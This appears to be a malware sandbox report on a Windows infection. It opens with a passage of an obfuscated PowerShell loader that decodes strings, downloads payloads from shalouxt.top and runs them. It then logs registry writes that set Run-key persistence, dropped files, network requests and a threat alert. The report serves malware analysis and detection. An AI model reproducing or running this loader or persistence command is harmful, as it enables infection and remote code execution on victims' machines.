Lret/Man,a1Speci3Athyr1Ene r. Va,l0';$Snufflingly=Klippesten 'nonimUM galSRat.beBrandRLegen-Tumblasali gUdtapEso guNF milT';$Flgevirkningen=Klippesten 'AfmilhKl.sttRovdyttermip EophsFartg:Nucle/stnkp/EftersWasheh DeviaTilbalUnconoTilbjuGramoxBlasftAlban.SnusftSbesroSk lepDrill/ SlarUDrumfnRealedFodg,e s blr DriksFi teh DissoFarimozi.cot platiMedicnFiligg Op r. RetrhRedethUdgank Farv> BranhUriditFriaktscoinp bo tsScorc: Marm/Ru bl/Spleuo airllD,garaSuccemLit.ol cau.t .ortdSky.e. 
FirstLe tioTrykkpcirku/D,lfiUH melnEquildStedmeNo derTi,nrs Frsth.enteobivouoSovjet dlerijournnFluorgKlger.DavenhCaus h Dib k';$Skurebrste=Klippesten 'Nonad>';$Sociolegal=Klippesten 'Inkari ondoeSammeX';$Lithically='Antimilitaristers';$Sciosophist='\Harmonicas.Pre';afsave (Klippesten 'Skide$ AfhoGNearcLAubrioB dgrBH.vedAS.eurl sush: ssaoK Pat O,jtrynGe,thFSoldeEKdetcREnk lCBuegaEHyperr Sama=Finge$ Lyc eOve.dn InclV Hnge:Sha pAF,mlepCopr pRenseDExa cAJuve TA chdaLob.l+Ditzi$SkattsSebbeCseqfciEncefOApicaSStrkmo ExtePAutarhAtro iUndlasEpokeT');afsave (Klippesten 'Opadb$To,meGSamselDeiceOKnoglbL boraBi grLIltfa:MalteACartsr Va rMPulveERib erPythoE aalDBenn eTag.t=Flj s$Kl ptfBegreLSu jeGHeralELrerivDomstIDisquRnoncokCa amNCoralI InvaNlamstgEcc oEUnwelNFodba.Asf,lsDildsP FastlYndl iAfpattHuser( Barm$ lageSBegunk DiplUCommir CoffeImushBm binrForbrsmodentSabbaePostu)');afsave (Klippesten $Kastepils);$Flgevirkningen=$Armerede[0];$Hyperstoical=(Klippesten 'Emm r$ ypecgBef,lLXer.pOAfghabSilu.aUnderlSynta:Sae,gbKabelR A fiARangsnCetacdPja ksOscartUnderAM llet ,eriI InveoLedi.NallineGouterT ingStranl= r guN Le.se,okkeWminds- PlayO Unc bCrassj.nsekETrom cAd ostSpydk B oknS PerpYR,vigSScragt Apose SovsMLetha.Urte,$Svansb GlosEP.earSLas aEMedicjCarryLUn,ere orneR');afsave ($Hyperstoical);afsave (Klippesten 'Trail$Detr B Ilpar OptaaTarmrnRegn,dRe.orsContrt .angaTilsytTran.iI,genoBesnrnVarekeUnprorAc uisTvrfa.BobleHYaponeStandaAntipd ForseRenrirColossC rtw[Budge$Sk.kkSInbitnreequu,ychefAn,elf.dhnglOrgieiDise,nSi,ulg F uslDyr myIndsk]Sparr= Back$PredeT Saldh SeroeSawbusFi.saaA,toeuBallerCassoi Hjers');$Euros=Klippesten 'Syn h$Thor,BMis.brDaaseaDexionbattedHo,chsLgnagtKon oaBagrut Un aiOplb oN vnknf.ldkeRuacurSt kos Dr v.BilleDInfido Cer wBi ian Raasl K,afoLinolaFiletd b keFVar.aiTithelParele Sa,b(Hyper$ oregFKokkel Ejb gSpideeNonupvBatisi Dv irReviskB,tjen Behnimagnin inclgSnoreeBega n Trol, arqu$Ra kfPHawsee SavvrAkt rf Skrio PagtrH vedaDi trtkiasbiAlgernUndevg 
and1Servi7Audio5Mokka)';$Perforating175=$Konfercer;afsave (Klippesten 'Whi,t$ P.ojgSnderlTwierOnonreB SyltAAfbenlTinam:MumneG Bnder Um eaUnde PHengiHBon oi ilmgc Bags= Niss(SpermTG.apiE Udl SsupplTUmenn- I dkPVolu,AVisitTPropohCifre Sight$WafflPDkkete BvreRHarrofhjemmo DonerBihulaEt erTDow sI talnAlterg Hous1 Dunj7 Arct5 onol)');while (!$Graphic) {afsave (Klippesten 'tric $StendgAarp.lCommaoProexbAnkeraJu kelvgter:ChresSVakuup ildeoPositrTinekv S.uloMechigFidlenRegiosWicopkRebouo Obstn usindModk,urea,mkintert G llr.erroeDagklnmatth=K dmi$Unre,S S amt Ph.eyFilatr Slagt VermeMega.gVagraoMottodTheats') ;afsave $Euros;afsave (Klippesten 'NonmesWilleTStovtA TortrRunolTTroug-FlyveSMerchLRandieHemateBarriP ers ewwo4');afsave (Klippesten 'Unsad$IntragRelstLNoncoOInfe BRe onaR gnbLByssu: Teksg allRmodelAskrotp ForsHEllysiStramcRevan=Temat( DrenTWaybiEHofmasNeph tDolke-Forl P Bipla Po zTBekomH jer Teleo$OyvinPJernbeafhopRAfs af PersoStrykrBri tAPanf TAlkylIBasopNVelatgFor.r1Neuro7Autos5Ancie)') ;afsave (Klippesten 'B,nem$kodesGUnderlart foOutecbLftpiASenenlStrmp:ToskiI ove n,ropugLizetEPhycoNEpi.rILigniR Sys,a FlygkP,eliAGlittD St.neOver M S ifiMaane=Recou$NedbrG Id oL SgeoO angB inieA sjleLDesig:Unc.rbPjatglDismiK MandK Fny eBegletConco+ prec+N,zit%Aviar$Pa,soaHaemoR yroMcy loEAristr EfteEAnte.dUds reGrund.UnnoocSolvooSophiuSkyndn menaT') ;$Flgevirkningen=$Armerede[$Ingenirakademi]}$Generindringsvelser=283334;$ekvilibrismen=32997;afsave (Klippesten 'M stn$ElvilGLibrilSjas oHammeBUn ubABrazilpr.ve:P attu ne,kdExplosOri lUUni.sgK rrenA delIAtoleNSubarGV jle Sgem=Tatou Mor,eGtubemeRidebtRati -FuldbcShopbOIsox n FirdTLynghEInstrnFnatmtBrne Hon,s$RegnepSt liEYe leRBumleF BiwioK,tchrLithaaFo krTGo.ssIA derN HurrgHyper1Nonro7rippl5');afsave (Klippesten 'Debr.$unpalgCo,pul Twiso K.llbHjteka PomplDrank:OrdurFTrff,o C,rrx Fulmg paavlDynamoForgavFoupoeNestlsTummi Gra h= rady Oxhi[ Un.aSNoneqySdvansCathot Hypoeblue,m Sl.t. 
ortCRambloAd.annEksigv .nkmeFor erGangltMacre] M.th:seedi:Uimo F .orur SkatoFor,tmBygbaB ilanaSquinsVaporeHaste6Forbe4LdervSQuin tBa.otrKoblei Mot nbitangKl rg(Nasal$GammaU nindKvasssgle nuStricgRkedanMollui Neo.n.laggg Entr)');afsave (Klippesten 'Fusio$AngreGOkkullNonalO m teBErgosaLiggelUnsen:Tama.hFremkECe trX SinnAArbejn red.G,tandu onomLComprAPengerkokst Gedes= Atte Krypt[M rblsLudlaypulstSLasertBoj.teBryd M S sa.Go siTDekupeJa,atX EdsfTStvko.PodsoeCykelNKa khc ForsO DisrdUnfisI ,revNRatteGletva]blati: Okku:P dotALi rdS Pa sc meriISttediScrim.Nedstg ZoomeAdrttT amsts Po nT reicRIntelIPrestNSightgColor(Domin$MaskiFOvernOI ebeX Jarbg enal InseOchontvBarkpeSinl,sWitho)');afsave (Klippesten 'Enren$LngodGOpv,rLS orsO Qu rb D,ciaUnconL Kont:PaniceBetracShagbhTrombOO arbWHibbeI Hur s MisieNevad=filmb$ ThiohUindbeChaldxBaandAFlowenH ndlGHai wUTeeuplTyndsAR marrOutdr.OverpsAnacluGeoloBOm,gnSExcoet.jergRAnnelIK ppenT vejGC unt( Warw$ TittG MartEFrihoNBorgee Ha,rROpseniD.conNTrugmdTeater,tueuIKethiN HyldgPrintsFigwoV,reckelignolNohowSShre ETheo,rDusto,Krite$Mi,roE LkkeKCrossvMilliIn,nliloplriiSinusb FornR FrasiHerp SKrateMStoplEBan nNTystn)');afsave $Echowise;
(PID) Process: (5752) msiexec.exe
Key: HKEY_CURRENT_USER\Environment
Operation: write
Name: Assheadedness
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process: (5444) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Startup key
Value:
%Assheadedness% -windowstyle 1 $Brneteaters=(gp -Path 'HKCU:\Software\Appendicial\').Regnskabschefens;%Assheadedness% ($Brneteaters)
Executable files
0
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 6032
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sgr52g5g.kzj.ps1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 3608
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mbfwkyqq.gcu.psm1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 6032
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Harmonicas.Pre
Type: text
MD5:B6EBCA13C1166B6E313870874BBD4A62
SHA256:8A259A4CF428E6D215663307A2A38C1BD300E3B0B12347598B935AC2D5AD4375
PID: 6032
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lscqneuz.ras.psm1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 3608
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Type: binary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
PID: 3608
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v4sla4jc.mzq.ps1
Type: text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 6032
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5:8920E431E4BA01D5E988185E870048D1
SHA256:4ECD790A8F8EE9D0996D2D743B66E440B7594671DB813F9A63724B1B8A47836C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
24
DNS requests
8
Threats
1

HTTP requests

Empty cells in the report are shown as "-".

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2480 | RUXIMICS.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
2480 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
4932 | svchost.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
4932 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 188.114.96.3:443 | https://shalouxt.top/Undershooting.hhk | unknown | text | 411 Kb | -
- | - | GET | 200 | 188.114.97.3:443 | https://shalouxt.top/ulABmEdjFLhPwz78.bin | unknown | binary | 280 Kb | -

Connections

Empty cells in the report are shown as "-".

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2480 | RUXIMICS.exe | 51.104.136.2:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4932 | svchost.exe | 51.104.136.2:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 2.23.209.191:443 | www.bing.com | Akamai International B.V. | GB | whitelisted
4712 | MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
2480 | RUXIMICS.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
4932 | svchost.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.191
  • 2.23.209.185
  • 2.23.209.182
  • 2.23.209.181
  • 2.23.209.188
  • 2.23.209.193
  • 2.23.209.189
  • 2.23.209.180
  • 2.23.209.186
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.9
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
shalouxt.top
  • 188.114.97.3
  • 188.114.96.3
unknown
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
self.events.data.microsoft.com
  • 20.189.173.1
whitelisted

Threats

PID | Process | Class | Message
2192 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile